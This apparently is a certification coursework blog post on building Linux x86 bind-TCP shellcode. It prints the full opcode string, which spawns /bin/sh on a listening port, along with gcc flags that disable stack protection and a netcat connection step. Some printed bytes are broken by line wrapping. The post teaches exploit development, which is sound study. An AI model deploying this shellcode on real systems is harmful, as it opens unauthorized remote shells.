- Assignment1.nasm
- compile.sh
- shconfig.py
- shellcode.c
In this assignment, I created a socketcall() in assembly and redirected STDIN, STDOUT, and STDERR to it. Using some cut and trim magic learned via commandlinefu, the opcodes were pasted into the shconfig.py program, which the user executes with an argument to specify the port used. That output is put into the shellcode.c skeleton program which is compiled without stack protection and allowing stack execution.
Here’s the trim command to extract the opcodes:
objdump -d ./shell_bind_tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Step 1: Compile assignment1.nasm
Step 2: Extract the opcodes
Run shconfig.py -p <port number of choice>
./shconfig.py -p 1337 Shellcode : "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1 \xcd\x80\x31\xff\x97\x6a\x66\x58\x6a\x02\x5b\x31\xc9\x51\x66\x68\x53\x9 \x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x31\xc9 \x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x31\xc9\x51\x51\x57\x89\xe1\xcd \x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x31\xc9\x51 \x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";
Insert that output into code[] variable of the skeleton C program.
Compile with:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
Run, and connect from another terminal with netcat on the port you specified using shconfig.py and you’re in!
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-860
